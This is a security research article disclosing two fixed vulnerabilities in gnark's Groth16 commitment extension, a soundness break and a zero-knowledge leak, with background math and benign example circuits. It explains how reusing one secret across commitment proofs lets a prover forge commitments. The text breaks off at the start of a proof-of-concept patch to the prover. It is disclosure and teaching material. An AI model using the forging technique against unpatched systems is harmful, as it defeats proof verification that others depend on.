gnark↗ is a popular zkSNARK library written in Go. One of two proving schemes offered by the gnark backend is a variant of the Groth16 scheme. This variant used by gnark is a modification of standard Groth16, extending it with commitments. In this article, we discuss two vulnerabilities that we found in this extension. The first breaks soundness and could allow a malicious prover to prove incorrect statements, whenever at least two commitments are used (CVE-2024-45039↗). The second breaks the zero-knowledge property of Groth16 proofs produced by gnark using commitments (CVE-2024-45040↗). In some cases, an attacker could use this vulnerability to recover private witnesses from a proof. We reported both vulnerabilities to the gnark team, and they have been fixed in version 0.11.0↗. Unless otherwise stated, the discussion below is based on gnark version 0.10.0.

This article will begin in the first two sections by introducing gnark and fixing notation as well as recalling the main components of the Groth16 proving system. In the third section, we then motivate and describe gnark’s extension to Groth16 involving commitments. Building from there, the fourth section explains the first of two vulnerabilities, the soundness one. Before explaining the second vulnerability in the sixth section, we take a step back and discuss commitment schemes and their security properties, particularly for Pedersen commitments. We provide some background on how we found the vulnerabilities as well as a timeline at the end.

## What Is gnark?

In this section, we will introduce gnark and its components via an example, assuming the reader already has basic familiarity with what zero-knowledge proofs are. (If you need an introduction to that first, check out our earlier blog post on an introduction to zero-knowledge.)

### Circuit Variables and Constraints

There are several parts involved in producing ZK proofs. The very first step is to define what it is we would like to prove. As an example, let us say we want to prove that a public natural number $N$ is not prime. Even more, we would like to prove that we actually know $1 < A, B$ so that $N = A\cdot B$. Given this specification, we then need to define a circuit consisting of circuit variables that could be private witnesses or public instances, together with constraints that these circuit variables need to satisfy. Defining a circuit like this is functionality offered by gnark’s front end. Here is how this could look for our example so far:

`// Here we define which circuit variables our circuit will have.`

type ExampleCircuit struct {

A frontend.Variable // Private witness

B frontend.Variable // Private witness

N frontend.Variable `gnark:",public"` // Public instance

}

// This function defines the constraints for our circuit

func (circuit *ExampleCircuit) Define(api frontend.API) error {

api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B

api.AssertIsDifferent(circuit.A, 0) // A != 0

api.AssertIsDifferent(circuit.A, 1) // A != 1

api.AssertIsDifferent(circuit.B, 0) // B != 0

api.AssertIsDifferent(circuit.B, 1) // B != 1

return nil

}

We first defined three circuit variables $A$, $B$, and $N$, making $N$ public. By default, circuit variables in gnark are private witnesses. The function `Define`

is then used to introduce constraints. In this case, we constrained $N = A \cdot B$ as well as ruled out that $A$ or $B$ were 0 or 1.

### Arithmetic Modulo $p$

This is not enough to actually ensure our statement, however. While in our original statement $N$, $A$, and $B$ were natural numbers, in the circuit we are actually working with elements of a prime field, so integers modulo a prime $p$. The constraint we introduced only ensures that $N$ and $A\cdot B$ have the same remainder when reduced modulo $p$. So how do we deal with that? One way would be to constrain $A$ and $B$ to be small enough that their product can never be as large as $p$. For example, if we only plan to use this circuit for $N$, which is at most a 16-bit number, then correct $A$ and $B$ will also be at most 16 bits wide. The $p$ we will later use will be a 254-bit number, so constraining $A$ and $B$ to be at most 16 bits wide will ensure that no wraparound can happen on multiplication.

### Range Checks

So how do we actually constrain $A$ and $B$ to be at most 16 bits wide? Checks like this are called range checks and are very common when writing circuits. Because of this, gnark’s standard library already contains an optimized implementation of range checks already, which we can use without needing to implement the logic for this ourselves:

`const bitnum = 8`

// This function defines the constraints for our circuit

func (circuit *ExampleCircuit) Define(api frontend.API) error {

api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B

api.AssertIsDifferent(circuit.A, 0) // A != 0

api.AssertIsDifferent(circuit.A, 1) // A != 1

api.AssertIsDifferent(circuit.B, 0) // B != 0

api.AssertIsDifferent(circuit.B, 1) // B != 1

rangeChecker := rangecheck.New(api)

rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum

rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum

return nil

}

### Proving Scheme

If we want to use gnark to produce proofs for this circuit, we first need to decide on the proving scheme and elliptic curve we would like to use. There are two proving schemes available: PlonK and (a variant of) Groth16. In this article, we only consider Groth16. There are also multiple curves available, and we choose the BN254 curve in our examples.

### Running Setup, Prover, and Verifier

Before we can produce an actual Groth16 proof for the above circuit, we must first run the setup, producing a proving key and verification key. The proving key will then be used by the prover along the public instances and private witnesses to produce the proof, and the verfication key will be used by the verifier together with the public instances and the proof to verify whether the proof is valid. The code for this looks as follows:

`func main() {`

// Compiles our circuit into a R1CS constraint system

var circuit ExampleCircuit

ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit)

// Groth16 setup, generating the proving key and verification key

pk, vk, _ := groth16.Setup(ccs)

// Witness definition

assignment := ExampleCircuit{A: 3, B: 10, N: 30}

witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField())

publicInstances, _ := witness.Public()

// Proving

proof, _ := groth16.Prove(ccs, pk, witness)

// Verifying

groth16.Verify(proof, vk, publicInstances)

}

If we run this, we will get output like the following, showing the proof was successfully produced and verified:

`19:32:11 INF compiling circuit`

19:32:11 INF parsed circuit inputs nbPublic=1 nbSecret=2

19:32:11 INF building constraint builder nbConstraints=29

19:32:11 DBG constraint system solver done nbConstraints=29 took=0.698133

19:32:11 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=29 took=2.139242

19:32:11 DBG verifier done backend=groth16 curve=bn254 took=3.499106

### The Zero-Knowledge Property

The zero-knowledge property means in this example that knowing only the public instance $N$ and the proof (as well as the verification and proving keys), it should be impossible to recover any knowledge about $A$ and $B$ apart from what is constrained in the circuit. In the example $N=30$, there are six nontrivial divisors of $N$, namely $2,3,5,6,10$, and $15$. Possibilities for $(A, B)$ are thus $(2, 15), (3, 10), (5, 6), (6, 5), (10, 3)$, and $(15, 2)$. There should be no way to check which of these the prover actually used. As we will later see, a vulnerability in the extension to Groth16 that was used by gnark meant that this was violated and it was in fact possible to recover what $A$ and $B$ were (up to version 0.10.0, fixed in version 0.11.0).

## Groth16 Proofs

Before we can discuss gnark’s extension to Groth16, we first briefly review how proofs for the original variant of Groth16 are constructed and verified. The Groth16 proving system was introduced in the paper “On the Size of Pairing-based Non-interactive Arguments↗” by Jens Groth, and the following summary closely follows section 3.2 of that paper.

For readers already familiar with the Groth16 proving system, the purpose of this section is mainly to fix notation and provide the relevant formulas that we will use throught the article for reference. For readers that are not familiar with the details of Groth16, the main takeaways are the following:

- The circuit variables are $a_1, \dots, a_m$, with $a_1,\dots, a_\ell$ the public inputs, and $a_{\ell+1}, \dots, a_m$ private witnesses.
- Out of the constraints of the circuit, a black-box setup process spits out a bunch of elliptic curve points that we give names like $L_i$ or $\alpha$. A list can be found in the table below.
- A proof consists of three elliptic curve points $A$, $B'$, and $C$, and there are formulas for how they are to be calculated by the prover from the points obtained from the setup step and from some $h_i$ that we treat as a black box for the purpose of this article. Why the formulas for these three points look the way they do is not relevant for this article, but we state the formulas because we will modify them later, when discussing gnark’s extension.
- There is an equation, given in the “Verifying” section below, that is checked by the verifier. The verifier accepts a proof if and only if the equation holds. Again, why this equation looks the way it does can be taken as given, but we state the equation as it will be modified later.
- Soundness of the Groth16 proving system means that if this equation holds, then the prover must have known witnesses satisfying the circuit constraints.

### Setup

There are three main parts that together make up the Groth16 proving system: the setup, the prover, and the verifier. The setup depends on the circuit and produces a proving key and a verifying key, where the former is used by the prover together with an assignement for the circuit variables to produce a proof, and the latter is used by the verifier together with the public instances to check validity of a proof.

The table below describes the data that make up the proving and verifying keys. We give both the notation used in the Groth16 paper as well as the notation used in the gnark source code. We also fix notation we will use below. In the **group** column, we specify which group the element is an element of, either $\mathbb{G}_1$ or $\mathbb{G}_2$. Those two abelian groups are subgroups of elliptic curves and come together with a suitable pairing $e\colon\mathbb{G}_1 \times \mathbb{G}_2 \to \mathbb{G}_T$. For readers who would like an introduction, we have an earlier article introducing what elliptic curve pairings are.
The precise ranges for $i$ in the various rows, how $u_i, v_i, w_i$ relate to the circuit, and so on is not relevant for our exposition, so we will not go into those questions. The interested reader can find the details in the Groth16 paper. The constant $\ell$ stands for the number of public instances. The notation $\left[x\right]_k$ refers to $x\cdot G_k$, where $x$ is an element of the scalar field and $G_k$ is a fixed generator for $\mathbb{G}_k$.

Group | Notation in this article | Notation in gnark | Notation in Groth16 | |
---|---|---|---|---|

Proving key | $\mathbb{G}_1$ | $\overline{\alpha} = \left[\alpha\right]_1$ | `G1.Alpha` | $\left[\alpha\right]_1$ |

$\overline{\beta} = \left[\beta\right]_1$ | `G1.Beta` | $\left[\beta\right]_1$ | ||

$\overline{\delta} = \left[\delta\right]_1$ | `G1.Delta` | $\left[\delta\right]_1$ | ||

$A_i$ | `G1.A[i]` | $\left[u_i(x)\right]_1$ | ||

$B_i$ | `G1.B[i]` | $\left[v_i(x)\right]_1$ | ||

$Z_i$ | `G1.Z[i]` | $\left[\frac{x^i t(x)}{\delta}\right]_1$ | ||

$K_{i+\ell+1}$ | `G1.K[i]` | $\left[\frac{\beta u_{i+\ell+1}(x) + \alpha v_{i+\ell+1}(x) + w_{i+\ell+1}(x)}{\delta}\right]_1$ | ||

$\mathbb{G}_2$ | $\overline{\beta}' = \left[\beta\right]_2$ | `G2.Beta` | $\left[\beta\right]_2$ | |

$\overline{\delta}' = \left[\delta\right]_2$ | `G2.Delta` | $\left[\delta\right]_2$ | ||

$B'_i$ | `G2.B[i]` | $\left[v_i(x)\right]_2$ | ||

Verifying key | $\mathbb{G}_1$ | $\overline{\alpha} = \left[\alpha\right]_1$ | `G1.Alpha` | $\left[\alpha\right]_1$ |

$\overline{\beta} = \left[\beta\right]_1$ | `G1.Beta` | $\left[\beta\right]_1$ | ||

$\overline{\delta} = \left[\delta\right]_1$ | `G1.Delta` | $\left[\delta\right]_1$ | ||

$L_i$ | `G1.K[i]` | $\left[\frac{\beta u_{i}(x) + \alpha v_{i}(x) + w_{i}(x)}{\gamma}\right]_1$ | ||

$\mathbb{G}_2$ | $\overline{\beta}' = \left[\beta\right]_2$ | `G2.Beta` | $\left[\beta\right]_2$ | |

$\overline{\delta}' = \left[\delta\right]_2$ | `G2.Delta` | $\left[\delta\right]_2$ | ||

$\overline{\gamma}' = \left[\gamma\right]_2$ | `G2.Gamma` | $\left[\gamma\right]_2$ |

### Proving

The prover takes as input the proving key and an assignment for the circuit variables $\left(a_1, \dots, a_m\right)$. Here, $a_1$ through $a_\ell$ are the public instances and $a_{\ell+1}$ through $a_{m}$ are the private witnesses. To simplify notation, we also set $a_0=1$.

The prover then calculates three group elements (two of $\mathbb{G}_1$ and one of $\mathbb{G}_2$), which jointly make up the proof. Below we again compare notation for the elements that make up the proof.

Group | Notation in this article | Notation in gnark | Notation in Groth16 |
---|---|---|---|

$\mathbb{G}_1$ | $A$ | `Ar` | $\left[A\right]_1$ |

$\mathbb{G}_2$ | $B'$ | `Bs` | $\left[B\right]_1$ |

$\mathbb{G}_1$ | $C$ | `Krs` | $\left[C\right]_1$ |

To calculate $A$, $B'$, and $C$, the prover will first sample random elements $r$ and $s$ of the scalar field and calculate certain elements $h_i$. (The details of this are not relevant for this article.) The proof points are then obtained as follows ($n$ can be thought of as the number of constraints in the circuit).

$\begin{align*} A &= \overline{\alpha} + \sum_{i=0}^{m} a_i \cdot A_i + r\cdot \overline{\delta} \\ B &= \overline{\beta} + \sum_{i=0}^{m} a_i \cdot B_i + s\cdot \overline{\delta} \\ B' &= \overline{\beta}' + \sum_{i=0}^{m} a_i \cdot B'_i + s\cdot \overline{\delta}' \\ C &= \sum_{i=\ell + 1}^{m} a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \end{align*}$### Verifying

To verify a proof $\left(A, B', C\right)$ for public instances $\left(a_1, \dots, a_\ell\right)$, the verifier checks whether the following equality holds.

$\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C, \overline{\delta}'\right) \end{equation*}$## gnark’s Extension to Groth16 Proofs

In this section, we will motivate and discuss the extension to Groth16 that is used by gnark.

### Random Linear Combinations and the Schwartz-Zippel Lemma

To motivate the extension, let us first take a step back and consider a generic problem.
In many situations where a prover wants to convince a verifier of some statements, this involves claims that a number of equalities $f_i = g_i$ hold ($f_i$ and $g_i$ are elements of some finite field $\mathbb{F}_p$ and $0 \leq i < k$).
One way to check all equations at once is checking a random linear combination instead. If $r_i$ are random elements of $\mathbb{F}_p$, then $f_i = g_i$ for all $i$ implies that $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$.
On the other hand, if there is a $j$ such that $x_j \neq y_j$, then only one in $p$ of tuples $\left(r_1, \dots, r_n\right)$ will satisfy $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$.^{1}
Thus, as long as the values $r_i$ are chosen uniformly random and independently of $f_i$ and $g_i$, the equality $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$ can be taken to be very strong evidence that $f_i = g_i$ for all $i$.

In some situations, calculating the sums on both sides might be cheap, but each equality check is expensive, so paying for the reduction from $n$ to only a single equality check with the calculation of the two linear combinations can be an improvement.

A variant of the above method is often used in practice. We can interpret the elements $f_i$ and $g_i$ as the coefficients of polynomials $f$ and $g$ of degree $k$. What we would like to show is that $f = g$, or equivalently $f-g = 0$. As $f-g$ is a polynomial of degree at most $k$, it must either be the zero polynomial or have at most $k$ different roots. The probability of a random element $\tau$ being a root of $f-g$, assuming that $f-g \neq 0$, is thus at most $k / p$, so tiny if $p$ is large compared to $k$. This statement (generalized to the multivariate case) is known as the Schwartz-Zippel lemma. The upshot is that if $f$ and $g$ evaluate to the same element on a random input $\tau$, then this can be taken as strong evidence for $f=g$. This is similar to the random linear combination check we discussed before, now using $r_i = \tau^i$.

Note that if $\tau$ can be chosen by the prover, then they could just calculate a root of $f-g$, so this would be insecure. Similarly, if $\tau$ is chosen randomly by the verifier, but the prover knows of $\tau$ before deciding on $f_i$ and $g_i$, they could cheat by, for example, setting $f_0 = \sum_{i=0}^{k-1} g_i \cdot \tau^i - \sum_{i=1}^{k-1} f_i \cdot \tau^i$.

The discussed technique is very widely used, and in fact, the Groth16 proof scheme itself uses it. Looking at the “Notation in Groth16” column in the table for the verification and proving keys above, $x$ plays the role of the random input, and $u_i$ and so on are polynomials related to the circuit’s constraints, which get evaluated at $x$ in order to construct the proving and verifying key. The proof essentially consists of points obtained by evaluating three polynomials at $x$. The argument for why the verifiers’ single equality check implies all constraints is precisely the argument that a polynomial of low degree evaluating to zero at a random point $x$ implies with high probability that the polynomial was already zero.

In Groth16’s case, the value of $x$ is not allowed to be known to the prover, as otherwise the system would be insecure, as previously discussed. Thus, the necessary values derived from $x$ are essentially hidden behind the elliptic curve discrete logarithm problem. (Knowing, for example, $u_i(x) \cdot G_1$ and $G_1$, with $G_1\in\mathbb{G}_1$, it should be computationally infeasible to calculate $u_i(x)$.) While $x$ might be present during the setup process to calculate the proving and verifying key, the value of $x$ is so-called toxic waste; it must be deleted to ensure no prover will know it. In practice, multiparty computation is used in the setup phase to ensure that no single party ever knows toxic-waste values such as $x$.

Given this is such a useful technique in many places, we might want to use it within a circuit as well. However, we run into a problem here. How do we obtain a random value within the circuit at proving time? We certainly cannot let the prover choose it, as that would be insecure and we want a noninteractive protocol, so there is no other party that could supply it. One thing we could do is to obtain $\tau$ as a hash of $f_i$ and $g_i$. Given a hash function that can be modeled as a random oracle, this would be secure as well. The malicious prover could now try again if the $\tau$ they got is not a root, but as the new $\tau$ obtained after modifying some $f_i$ and/or $g_i$ will be random and unrelated to previously seen values, the best they can do is brute-force.

This procedure allows us to use the technique of reducing checking many equalities to only checking one equality within circuits. However, we now have to compute a hash in circuit, which may be quite expensive itself. It would thus be very useful if a circuit variable could be somehow constrained to be a hash of some other circuit variables without actually having to add these constraints in circuit. This is exactly what the extension to Groth16 that is used by gnark does.

### Splitting Out a Commitment

In order to have hashes of some circuit variables available in circuit, gnark allows to commit to collections of circuit variables. These commitments are elements of $\mathbb{G}_1$, and a hash calculated from them is added as additional public inputs to the circuit. There can be more than one commitment, and each commitment can be to one or more circuit variables, both public instances and private witnesses. In the following, we will, however, just describe the case where only private witnesses are commited to, to simplify notation.

How to design such a system? Merely committing to some values is easy, and there are many schemes that can be used to commit to values, such as the Pedersen commitment scheme, which we will discuss later in this article. So the prover could just, in addition to the normal Groth16 proof, also provide some commitments to some values. However, we do not want a Groth16 proof together with some unrelated commitments — we want the committed values to be the same values as the ones assigned to the circuit variables in the Groth16 proof. So there must be some linkage between the commitments and the (verification of) the Groth16 proof. This leads to the idea of starting by splitting off from one of the proof points of the summands concerning the circuit variables that are to be committed. This split-off point is then used as the commitment. But this point will also still need to be used in the verification equation, thereby linking it to the rest of the Groth16 proof.

Concretely, in the gnark extension, the commitment is removed from the $C$ proof point. This new point will then fill in for the missing part of $C$ in the proof verification. But as it is split off as a separate element, it can be used as input for hashing so that the verifier can compute that additional public input made up of the hashed commitment.

We will keep notation from before, so $\left(a_1, \dots, a_m\right)$ are the circuit variables, where $a_{\ell+1}$ through $a_m$ are the private witnesses. We assume we want to make $k$-many commitments to pairwise disjoint subsets of the the private witnesses. For this, we introduce indexing sets $\mathcal{J}_1, \dots, \mathcal{J}_k \subseteq \{\ell + 1, \dots, m\}$. So the $i$-th commitment should commit to circuit variables $a_{j}$ for $j\in \mathcal{J}_i$. We also introduce notation for the set of indexes of all committed circuit variables $\mathcal{J} \coloneqq \bigcup\limits_{i=1}^{k} \mathcal{J}_i$. What we can now do is replace the proof point $C$ from vanilla Groth16 (we will call the value this point has in vanilla Groth16 by $C_{\mathrm{old}}$ below for clarity) by a modified $C_{\mathrm{new}}$ and add new points $D_1, \dots, D_k$ for the commitments.

$\begin{align*} C_{\mathrm{old}} &= \sum_{i \in \{\ell+1, \dots, m\} } a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ C_{\mathrm{new}} &= \sum_{i \in \{\ell+1, \dots, m\} \setminus \mathcal{J} } a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ D_i &= \sum_{j \in \mathcal{J}_i } a_j\cdot K_j \end{align*}$Then the verifier can add the sum of the $D_i$ to $C$ when checking the proof, so instead of

$\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{old}}, \overline{\delta}'\right) \end{equation*}$the check will be

$\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}} + \sum_{i=1}^k D_i, \overline{\delta}'\right) \end{equation*}$Now we have points $D_i$ available that depend on the circuit variables committed to for the $i$-th commitment. But the goal we outlined initially was that we wanted to have in-circuit challenges depending on those committed circuit variables, so we need one more step. Let $\mathcal{H}$ be a hash function that maps points of $\mathbb{G}_1$ to $\mathbb{F}_p$. We can then use $\mathcal{H}$ to convert the commitment points to elements of $\mathbb{F}_p$, which we then use as public inputs to the circuit:

$\begin{equation*} a_{\ell-k-1+i} \coloneqq \mathcal{H}(D_i) \end{equation*}$Now these circuit variables $a_{\ell-k-1+i}$ can be used in circuit as challenges that depend on the circuit variables committed to with $D_i$, for example in Schwartz-Zippel–style equality checks, as discussed above.

As is, there would be a big problem for this scheme, however: the verification does not depend on $C_{\mathrm{new}}$ and all $D_i$ individually, only on the sum $C_{\mathrm{new}} + \sum_{i=1}^k D_i$. A malicious prover could thus just replace the honest $D_i$ by arbitrarily chosen $D_i^{\mathrm{fake}}$ by setting $C_{\mathrm{new}}^{\mathrm{fake}} = C_{\mathrm{new}} + \sum_{i=1}^k D_i - \sum_{i=1}^k D_i^{\mathrm{fake}}$.

### Preventing Fungibility of the Commitments Using Separate Proofs of Knowledge

So how could one prevent the kind of fungibility of the commitments that we just discussed?

The approach to this is to make the prover supply a proof of knowledge of coefficients $a_j$ for $j \in \mathcal{J}_i$ so that $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot K_j$. This would ensure that $D_i$ is not fully arbitrary but was constructed as a linear combination of the expected points. (We will explain later how such a proof of knowledge would look like.) This helps but isn’t enough; a malicious prover could still, for example, use $D_i=0$ by just adding the relevant summands that should appear in the legitimate $D_i$ to $C_{\mathrm{new}}$ instead. So we will also have to require a proof of knowledge of relevant coefficients for $C_{\mathrm{new}}$, ensuring that $C_{\mathrm{new}}$ was constructed as a linear combination of only the expected elliptic curve points.

There is one optimization that we can do here to only need proofs of knowledge for $D_i$. Instead of pairing $D_i$ with $\overline{\delta}'$, grouping it with $C_{\mathrm{new}}$, we could pair $D$ with $\overline{\gamma}'$, so grouping it with $\sum_{i=0}^{\ell} a_i \cdot L_i$. In this case, we do not need a proof of knowledge associated with $\sum_{i=0}^{\ell} a_i \cdot L_i$ for being of this form, because it is the verifier itself that computes this linear combination, and so by construction, it will be a linear combination of only points $L_i$ with $0 \leq i \leq \ell$. So we save one proof of knowledge. For this, we must slightly adjust $D_i$, however, so that we will have the following:

$\begin{align*} D_i &= \frac{\delta}{\gamma} \cdot \left(\sum_{j \in \mathcal{J}_i } a_j\cdot K_j\right) = \sum_{j \in \mathcal{J}_i } a_j\cdot \left(\frac{\delta}{\gamma} \cdot K_j\right) \end{align*}$The prover should not know $\delta$, $\gamma$, or $\frac{\delta}{\gamma}$ of course, so the points $\frac{\delta}{\gamma} \cdot K_i$ will be part of the proving key. We actually already have notation that we can use for $\frac{\delta}{\gamma} \cdot K_i$, namely $L_i$. In a vanilla Groth16 proving key, $L_i$ does not appear, and the verification key has $L_j$ for $0 \leq j \leq \ell$. However, the formula for $L_i$ is precisely what $\frac{\delta}{\gamma} \cdot K_i$ is for $i > \ell$. Hence we can write $D_i$ as follows:

$\begin{align*} D_i &= \sum_{j \in \mathcal{J}_i } a_j\cdot L_j \end{align*}$The verifier will now add $D_i$ to the term from the public input when checking the proof, so it will check that

$\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=1}^k D_i + \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}}, \overline{\delta}'\right) \end{equation*}$Assuming the protocol also includes proofs of knowledge for all $D_i$ as mentioned before, showing that the resulting protocol is sound likely boils down to an argument similar to Theorem 1 of the Groth16 paper↗.

The extension used by gnark uses this solution. One of the two vulnerabilities we report on in this article relates to the way that the proofs of knowledge were batched, and we will explain how the proofs of knowledge coming with $D_i$ work in the next section, where we will also explain the vulnerability.

## The Soundness Vulnerability

In this section, we discuss the soundness vulnerability present in gnark up to version 0.10.0 in cases where more than one commitment is used. We will begin by explaining how proofs of knowledge associated to an individual commitment would look like, then explain how they can be batched, and finally discuss the even more compressed batched verification used by gnark up to version 0.10.0 that however resulted in a vulnerability.

### Proofs of Knowledge of Coefficients of a Linear Combination

As explained before, we must require the prover to supply together with $D_i$ a proof of knowledge of coefficients $(a_j)_{j\in\mathcal{J}_i}$ such that $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$. Such a proof of knowledge must be provided for $1 \leq i \leq k$. We will start by fixing $i$ and discuss how to construct a single such proof of knowledge.

This can be done as follows. During the setup phase, an additional toxic-waste field element $\sigma_i$ is sampled, and $\sigma_i\cdot L_j$ is added to the proving key for $j\in\mathcal{J}_i$. Furthermore, $[\sigma_i]_2 \in \mathbb{G}_2$ is added to the verification key. The prover now provides together with $D_i$ also a point $P_i$ of $\mathbb{G}_1$, calculated as $P_i = \sum_{j \in \mathcal{J}_i } a_j\cdot (\sigma_i \cdot L_j)$. The verifier carries out the following check:

$\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \end{equation*}$Why should the above equality coinvince the verifier that $D_i$ is of the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$? The idea is that the malicious prover could only have arranged this equality to hold if $P_i = \sigma_i \cdot D_i$, but as they do not know $\sigma_i$, the only way they could have managed this is by calculating $D_i$ as a linear combination of points for which mulitplication by the scalar $\sigma_i$ is already known. But the only points of that form are $L_j$ for $j\in\mathcal{J}_i$.

### Batching the Proofs of Knowledge

In the previous subsection, we discussed the kind of proof of knowledge needed for each commitment. Each of the verifications requires two pairings, which are quite expensive, however. So it would be good if verification of $k$ such proofs of knowledge could be done in fewer pairings than $2\cdot k$ many.

This is actually exactly the kind of situation we discussed initially in this article when motivating why in-circuit random challenges and hence commitments are useful: to be able to use Schwartz-Zippel–style compressed equality checks. This is precisely one example where the equality check is expensive, as it involves computing pairings.

Compressing this check in Schwartz-Zippel style thus begins by generating a random challenge $r\in\mathbb{F}_p$. As this happens on the side of the verifier, they can just use a random number generator for this, if one is available. In contexts where the verifier can not use randomness, one may use $r=\mathcal{H}(D_1,\dots, D_k, P_1, \dots, P_k)$. Then instead of verifying

$\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \text{ for } 1 \leq i \leq k \end{equation*}$the verifier can instead verify

$\begin{equation*} \sum_{i=1}^k r^{k-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} \sum_{i=1}^k r^{k-1} e\left(P_i, [1]_2\right) \end{equation*}$So far nothing is won, as this still involves $2\cdot k$ pairings. However, the right-hand side can be rewritten to be calculated with a single pairing, using bilinearity of $e$, which makes $e\left(\_, [1]_2\right)$ linear.

$\begin{equation*} \sum_{i=1}^k r^{k-1} e\left(P_i, [1]_2\right) = e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}$The upshot is that the verifier may verify the proofs of knowledge $P_1, \dots, P_k$ by checking the following equality.

$\begin{equation*} \sum_{i=1}^k r^{k-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}$This requires $k+1$ pairings.

### Proofs of Knowledge for Commitments in gnark up to Version 0.10.0

To compress the equality check we just arrived at further, one would also like to use bilnearity on the left-hand side to move the sum into the inputs to the pairing, similarly to how it was done for the right-hand side. However, this is not possible, as neither of the two inputs is held constant across the sum, unless $\sigma_i$ is independent of $i$.

Up to version 0.10.0, gnark thus in fact used the same $\sigma_i = \sigma$ for each of the proofs of knowledge associated to the commitments. This meant that the verification could be compressed further, so that only two pairings were required:

$\begin{equation*} e\left(\sum_{i=1}^k r^{k-1} D_i, [\sigma]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}$### The Soundness Vulnerability: Fungibility of Commitments

However, there is an issue with choosing the same $\sigma$ for all the proofs of knowledge, as long as there is more than one. When we argued for why the check the verifier does should convince them that $D_i$ is of the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$, we used that the only points of $\mathbb{G}_1$ for which the prover also knows their product with $\sigma_i$ were $L_j$ for $j \in \mathcal{J}_i$. However, if $\sigma_1 = \cdots = \sigma_k$, then $L_j$ is such a point for $j \in \bigcup\limits_{i=1}^{k}\mathcal{J}_i$. Thus, the proofs of knowledge only convince the verifier that the prover knows $a_{l, j}$ so that $D_i = \sum_{l=1}^k \sum_{j \in \mathcal{J}_l } a_{l, j}\cdot L_j$.

What does this mean in practice? Say there are $k$ commitments as usual, and the correctly computed points would be $D_1^{\mathrm{correct}}, \dots, D_k^{\mathrm{correct}}$. Then the malicious prover could use $D_1^{\mathrm{fake}}, \dots, D_k^{\mathrm{fake}}$ as commitments, where, for example, all but one of them (say all but $D_k^{\mathrm{fake}}$) are set to $0 \in \mathbb{G}_1$, with the remaining commitment carrying the contributions missing from the others as well (so $D_k^{\mathrm{fake}} = \sum_{i=1}^{k} D_i^{\mathrm{correct}}$). Now for $i<k$, the challenge point $\mathcal{H}(D_i^{\mathrm{fake}})$ obtained in circuit from the commitment to circuit variables $a_j$ for $j\in \mathcal{J}_i$ does not actually depend on the assignments to any circuit variables anymore but stays fixed. But for most uses of such challenge points, such as when compressing checks using the Schwartz-Zippel lemma, the in-circuit logic will not be sound anymore if the challenge point is not obtained from a random function of the committed-to circuit variables.

We emphasize that this issue only occurs when more than one commitment is used. The most likely way a circuit uses commitments will be the range checks from the standard library, which can use them internally, should the backend support commitments. However, commitments for range checks are used via the multicommit package↗, which only creates a single commitment. Thus, circuits using commitments purely through range checks or otherwise through multicommit will not be vulnerable, as only a single commitment is used.

### Proof of Concept

To demonstrate the issue that we just discussed, we produced a proof of concept. In it, we construct a cicuit with two private witnesses, to which we assign random values. We commit individually to both private witnesses, producing two commitments and in-circuit challenges $c_1$ and $c_2$ corresponding to those commitments. We use the fungibility between the commitments to produce a proof with $D_1^{\mathrm{fake}} = 0$ and $D_2^{\mathrm{fake}} = D_1^{\mathrm{correct}} + D_2^{\mathrm{correct}}$. Like this, no matter what we assign to the two private witnesses, the first challenge $c_1$ will always be a constant, the hash of the zero point.

As the commitments are calculated in the gnark library (rather than being passed to it as an argument), we need to patch the prover part of gnark to produce our malicious proofs. This is done with the following patch, based on version 0.10.0:

`diff --git a/backend/groth16/bn254/prove.go b/backend/groth16/bn254/prove.go`

index 100f30e8..1cf93b96 100644

--- a/backend/groth16/bn254/prove.go

+++ b/backend/groth16/bn254/prove.go

@@ -60,7 +60,7 @@ func (proof *Proof) CurveID() ecc.ID {

}

// Prove generates the proof of knowledge of a r1cs with full witness (secret + public part).

